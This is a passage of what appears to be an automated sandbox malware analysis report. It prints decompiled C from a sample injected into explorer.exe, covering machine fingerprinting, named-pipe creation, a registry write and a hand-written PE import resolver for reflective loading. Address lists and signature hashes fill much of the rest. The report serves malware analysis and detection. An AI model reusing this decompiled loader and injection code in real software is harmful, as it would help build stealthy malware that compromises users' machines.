				_t15 = _t61;
				goto L12;
			}
























                            0x10001b2d
                            0x10001b33
                            0x10001b41
                            0x10001baf
                            0x10001b4e
                            0x10001b53
                            0x10001b59
                            0x10001b5e
                            0x10001b64
                            0x10001b66
                            0x10001b6a
                            0x10001c64
                            0x10001c64
                            0x10001b70
                            0x10001b70
                            0x10001b7c
                            0x10001b7c
                            0x10001b88
                            0x10001b8e
                            0x10001b90
                            0x00000000
                            0x10001b92
                            0x10001b92
                            0x10001b9c
                            0x10001ba2
                            0x10001ba8
                            0x10001baa
                            0x00000000
                            0x10001baa
                            0x10001b72
                            0x10001b72
                            0x10001b76
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x10001b76
                            0x10001b70
                            0x10001c5d
                            0x10001c63
                            0x10001c63
                            0x10001bb8
                            0x10001bcc
                            0x10001bcf
                            0x10001bd9
                            0x10001be5
                            0x10001bef
                            0x10001bf0
                            0x10001bf1
                            0x10001bf2
                            0x10001bf7
                            0x10001c00
                            0x10001c04
                            0x10001c06
                            0x10001c07
                            0x10001c0f
                            0x10001c10
                            0x10001c16
                            0x10001c1b
                            0x10001c21
                            0x10001c21
                            0x10001c26
                            0x10001c31
                            0x10001c34
                            0x10001c3c
                            0x10001c48
                            0x10001c4b
                            0x10001c51
                            0x10001c56
                            0x10001c5b
                            0x00000000

                            APIs
                            • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
                            • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
                            • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
                            • DuplicateHandle.KERNEL32 ref: 10001BD9
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Current$Process$DuplicateHandleThread
                            • String ID:
                            • API String ID: 3566409357-0
                            • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                            • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
                            • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                            • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: explorer.exe PID: 2072 Parent PID: 2984 explorer.exeCOMMON

                            Executed Functions

                            Function 00085A61, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00085A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x9e684; // 0xc2f8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
				E00085631(_t6, _t7); // executed
				return 0;
			}






                            0x00085a61
                            0x00085a6d
                            0x00085a73
                            0x00085a7a

                            APIs
                            • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionHandlerVectored
                            • String ID:
                            • API String ID: 3310709589-0
                            • Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                            • Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
                            • Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                            • Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00084A0B, Relevance: 10.8, APIs: 7, Instructions: 285stringpipeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 84a0b-84a3f memset 1 84a5b-84a64 call 8bb8d 0->1 2 84a41-84a57 0->2 6 84a7f-84ae0 call 8b7a8 call 8b67d call 849c7 call 8c379 call 8d400 call 8b88a call 82c8f 1->6 7 84a66-84a71 call 82ba4 1->7 2->1 26 84aea-84b09 call 892e5 6->26 27 84ae2-84ae5 6->27 11 84a76-84a79 7->11 11->6 13 84d64 11->13 15 84d66-84d6c 13->15 30 84b0b-84b13 26->30 31 84b5e-84b63 26->31 27->13 32 84b51-84b53 30->32 33 84b15-84b4f call 895e1 call 8bfec call 885d5 30->33 34 84b65-84b97 call 8c292 CreateNamedPipeA 31->34 35 84bc6-84bdb call 891e3 * 2 31->35 32->31 38 84b55-84b59 call 8e286 32->38 33->38 44 84b99-84ba9 call 8861a 34->44 45 84bae-84bc4 call 8861a 34->45 54 84be0-84c01 call 89b43 35->54 38->31 44->15 45->54 54->13 60 84c07-84c49 call 89f48 call 89f6c call 8a0ab 54->60 67 84c4b-84c4d call 8a3ed 60->67 68 84c52-84c57 60->68 67->68 70 84c59-84c5b call 8a3ed 68->70 71 84c60-84c7d call 8980c call 8a0ab 68->71 70->71 76 84c82-84c8a 71->76 77 84c8c-84c98 76->77 78 84cb2-84cbf 76->78 79 84c9a 77->79 80 84cdd-84ce4 77->80 81 84cc9-84cd6 call 8fc1f 78->81 82 84cc1-84cc7 78->82 83 84ca0-84ca2 call 8553f 79->83 85 84cee-84cfe call 852c0 80->85 86 84ce6-84ce9 call 8e23e 80->86 92 84ca7-84ca9 81->92 82->83 83->92 93 84d00-84d0c 85->93 94 84d55-84d5a 85->94 86->85 95 84cd8 92->95 96 84cab 92->96 97 84d4d-84d4f lstrcpyW 93->97 98 84d0e-84d4b call 8109a lstrcpyW call 885d5 lstrcatW * 3 93->98 99 84d5c-84d60 94->99 100 84d62 94->100 95->80 96->78 97->94 98->94 99->100 100->13
                            C-Code - Quality: 80%
                            			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				CHAR* _v1112;
				char _v1116;
				void* __esi;
				intOrPtr _t66;
				CHAR* _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				CHAR* _t106;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xb0000
					_t125 =  *0x9e68c; // 0xc2fab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E0008B7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E0008B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
					E0008B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891E3(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891E3(_t145);
								L17:
								_push(_t145);
								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9ca);
								E00089F48(0xe); // executed
								E00089F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E0008A0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E0008980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E23E(_t183);
										}
										E000852C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xb0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb0228
									_t153 = _t51;
									L25:
									_t90 = E0008553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0008C292(_v1104, __eflags);
							_v1112 = _t106;
							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0xc2f8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E0008861A( &_v1116, _t192);
								_t145 = _t108;
								goto L17;
							}
							E0008861A( &_v1112, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E286(_v1112, _t175); // executed
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}





























































                            0x00084a0b
                            0x00084a18
                            0x00084a23
                            0x00084a28
                            0x00084a2a
                            0x00084a2d
                            0x00084a32
                            0x00084a35
                            0x00084a3f
                            0x00084a41
                            0x00084a4e
                            0x00084a57
                            0x00084a57
                            0x00084a64
                            0x00084a7f
                            0x00084a86
                            0x00084a88
                            0x00084a8d
                            0x00084a92
                            0x00084a98
                            0x00084aa7
                            0x00084ac6
                            0x00084ac8
                            0x00084ace
                            0x00084ad4
                            0x00084ad9
                            0x00084add
                            0x00084ae0
                            0x00084aea
                            0x00084aec
                            0x00084aed
                            0x00084af8
                            0x00084afa
                            0x00084afd
                            0x00084b02
                            0x00084b09
                            0x00084b5e
                            0x00084b5e
                            0x00084b63
                            0x00084bca
                            0x00084bcf
                            0x00084bd1
                            0x00084bdb
                            0x00084be0
                            0x00084be0
                            0x00084bf5
                            0x00084bfa
                            0x00084bfc
                            0x00084bff
                            0x00084c01
                            0x00000000
                            0x00000000
                            0x00084c07
                            0x00084c11
                            0x00084c1a
                            0x00084c1f
                            0x00084c22
                            0x00084c28
                            0x00084c2e
                            0x00084c36
                            0x00084c38
                            0x00084c3b
                            0x00084c3c
                            0x00084c41
                            0x00084c44
                            0x00084c47
                            0x00084c49
                            0x00084c4d
                            0x00084c4d
                            0x00084c52
                            0x00084c55
                            0x00084c57
                            0x00084c5b
                            0x00084c5b
                            0x00084c62
                            0x00084c67
                            0x00084c69
                            0x00084c6d
                            0x00084c6f
                            0x00084c75
                            0x00084c79
                            0x00084c7c
                            0x00084c7d
                            0x00084c82
                            0x00084c85
                            0x00084c8a
                            0x00084cb2
                            0x00084cb8
                            0x00084cbf
                            0x00084cce
                            0x00084cd3
                            0x00000000
                            0x00084cd3
                            0x00084cc1
                            0x00000000
                            0x00084c8c
                            0x00084c8c
                            0x00084c91
                            0x00084c98
                            0x00084cdd
                            0x00084cdd
                            0x00084ce4
                            0x00084ce8
                            0x00084ce9
                            0x00084ce9
                            0x00084cf3
                            0x00084cf8
                            0x00084cfb
                            0x00084cfc
                            0x00084cfe
                            0x00084d00
                            0x00084d05
                            0x00084d0c
                            0x00084d4f
                            0x00084d0e
                            0x00084d13
                            0x00084d1b
                            0x00084d1f
                            0x00084d2a
                            0x00084d35
                            0x00084d3d
                            0x00084d41
                            0x00084d49
                            0x00084d49
                            0x00084d0c
                            0x00084d55
                            0x00084d58
                            0x00084d5a
                            0x00084d60
                            0x00084d60
                            0x00084d62
                            0x00084d62
                            0x00000000
                            0x00084d62
                            0x00084c9a
                            0x00084c9a
                            0x00084ca0
                            0x00084ca2
                            0x00084ca7
                            0x00084ca7
                            0x00084ca9
                            0x00084cd8
                            0x00000000
                            0x00084cd8
                            0x00084cab
                            0x00084ae4
                            0x00084ae4
                            0x00000000
                            0x00084ae4
                            0x00084c8a
                            0x00084b69
                            0x00084b77
                            0x00084b8f
                            0x00084b95
                            0x00084b97
                            0x00084baf
                            0x00084bb4
                            0x00084bbd
                            0x00084bc3
                            0x00000000
                            0x00084bc3
                            0x00084b9f
                            0x00084ba8
                            0x00000000
                            0x00084ba8
                            0x00084b0b
                            0x00084b11
                            0x00084b13
                            0x00084b51
                            0x00084b53
                            0x00000000
                            0x00000000
                            0x00084b55
                            0x00084b59
                            0x00000000
                            0x00084b59
                            0x00084b15
                            0x00084b1f
                            0x00084b2b
                            0x00084b36
                            0x00084b3d
                            0x00084b47
                            0x00084b4c
                            0x00000000
                            0x00084b4c
                            0x00084ae2
                            0x00000000
                            0x00084a66
                            0x00084a71
                            0x00084a77
                            0x00084a79
                            0x00084d64
                            0x00084d64
                            0x00084d66
                            0x00084d6c
                            0x00084d6c
                            0x00000000
                            0x00084a79

                            APIs
                            • memset.MSVCRT ref: 00084A2D
                            • CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 00084B8F
                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
                            • lstrcatW.KERNEL32 ref: 00084D3D
                            • lstrcatW.KERNEL32 ref: 00084D41
                            • lstrcatW.KERNEL32 ref: 00084D49
                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$CreateNamedPipememset
                            • String ID:
                            • API String ID: 2307407751-0
                            • Opcode ID: c5e3f3734ff40b9b32b5f53794db4090d90e5f77e8c3d0d72d8dc6ffaebd0e71
                            • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                            • Opcode Fuzzy Hash: c5e3f3734ff40b9b32b5f53794db4090d90e5f77e8c3d0d72d8dc6ffaebd0e71
                            • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008B7A8, Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E0008B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885D5( &_v16);
				_t33 = E0008C392(_t43);
				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
			}















                            0x0008b7a8
                            0x0008b7b1
                            0x0008b7bd
                            0x0008b7c3
                            0x0008b7c5
                            0x0008b7cd
                            0x0008b7e0
                            0x0008b7ef
                            0x0008b7fa
                            0x0008b807
                            0x0008b821
                            0x0008b826
                            0x0008b828
                            0x0008b82f
                            0x0008b83f
                            0x0008b850
                            0x0008b85a
                            0x0008b862
                            0x0008b869
                            0x0008b86c
                            0x0008b889

                            APIs
                            • memset.MSVCRT ref: 0008B7C5
                            • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
                            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
                              • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                            • lstrcatW.KERNEL32 ref: 0008B85A
                            • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                            • String ID:
                            • API String ID: 3410906232-0
                            • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                            • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                            • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                            • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008CF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E0008CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xb0000
				GetCurrentProcess();
				_t11 = E0008BA05(); // executed
				_t1 = _t29 + 0x1644; // 0xb1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3B6(_t3);
				_t7 = _t29 + 0x220; // 0xb0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








                            0x0008cf87
                            0x0008cf89
                            0x0008cf90
                            0x0008cf98
                            0x0008cfa2
                            0x0008cfa2
                            0x0008cfa8
                            0x0008cfb1
                            0x0008cfb7
                            0x0008cfb9
                            0x0008cfbd
                            0x0008cfbd
                            0x0008cfc2
                            0x0008cfc8
                            0x0008cfd8
                            0x0008cfe2
                            0x0008cfea
                            0x0008cfed
                            0x0008cff9
                            0x0008cfff
                            0x0008d004
                            0x0008d00a
                            0x0008d010
                            0x0008d016
                            0x0008d01e

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                            • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                            • memset.MSVCRT ref: 0008CFE2
                            • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                            • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$FileModuleNameVersionmemset
                            • String ID:
                            • API String ID: 3581039275-0
                            • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                            • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                            • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                            • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0009249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 134 9249b-924a9 135 924ab-924ae 134->135 136 924b3-924f3 GetModuleHandleA call 8e099 134->136 137 92660-92661 135->137 140 924f9-92510 136->140 141 9265e 136->141 142 92513-9251a 140->142 141->137 143 9251c-92525 142->143 144 92527-92537 142->144 143->142 145 9253a-92541 144->145 145->141 146 92547-9255e LoadLibraryA 145->146 147 92568-9256e 146->147 148 92560-92563 146->148 149 9257d-92586 147->149 150 92570-9257b 147->150 148->137 151 92589 149->151 150->151 152 9258d-92593 151->152 153 92599-925b1 152->153 154 92650-92659 152->154 155 925b3-925d2 153->155 156 925d4-92602 153->156 154->145 159 92605-9260b 155->159 156->159 160 92639-9264b 159->160 161 9260d-9261b 159->161 160->152 162 9261d-9262f 161->162 163 92631-92637 161->163 162->160 163->160
                            C-Code - Quality: 50%
                            			E0009249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                            0x000924a1
                            0x000924a9
                            0x000924be
                            0x000924d0
                            0x000924dc
                            0x000924e2
                            0x000924e7
                            0x000924f3
                            0x0009265e
                            0x00000000
                            0x0009265e
                            0x000924f9
                            0x00092502
                            0x00092510
                            0x00092513
                            0x00092522
                            0x00092522
                            0x00092529
                            0x00092537
                            0x0009253a
                            0x00092551
                            0x00092557
                            0x0009255e
                            0x0009256e
                            0x00092586
                            0x00092570
                            0x00092578
                            0x00092578
                            0x00092589
                            0x0009258d
                            0x00092599
                            0x0009259d
                            0x000925a1
                            0x000925a5
                            0x000925b1
                            0x000925dc
                            0x000925e4
                            0x000925f6
                            0x00092602
                            0x000925b3
                            0x000925b8
                            0x000925c3
                            0x000925cf
                            0x000925cf
                            0x0009260b
                            0x00092611
                            0x0009261b
                            0x00092637
                            0x0009261d
                            0x0009262c
                            0x0009262c
                            0x0009261b
                            0x0009263f
                            0x00092648
                            0x00092648
                            0x00092656
                            0x00000000
                            0x00092656
                            0x00092562
                            0x00000000
                            0x00092562
                            0x00000000
                            0x0009253a
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                            • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
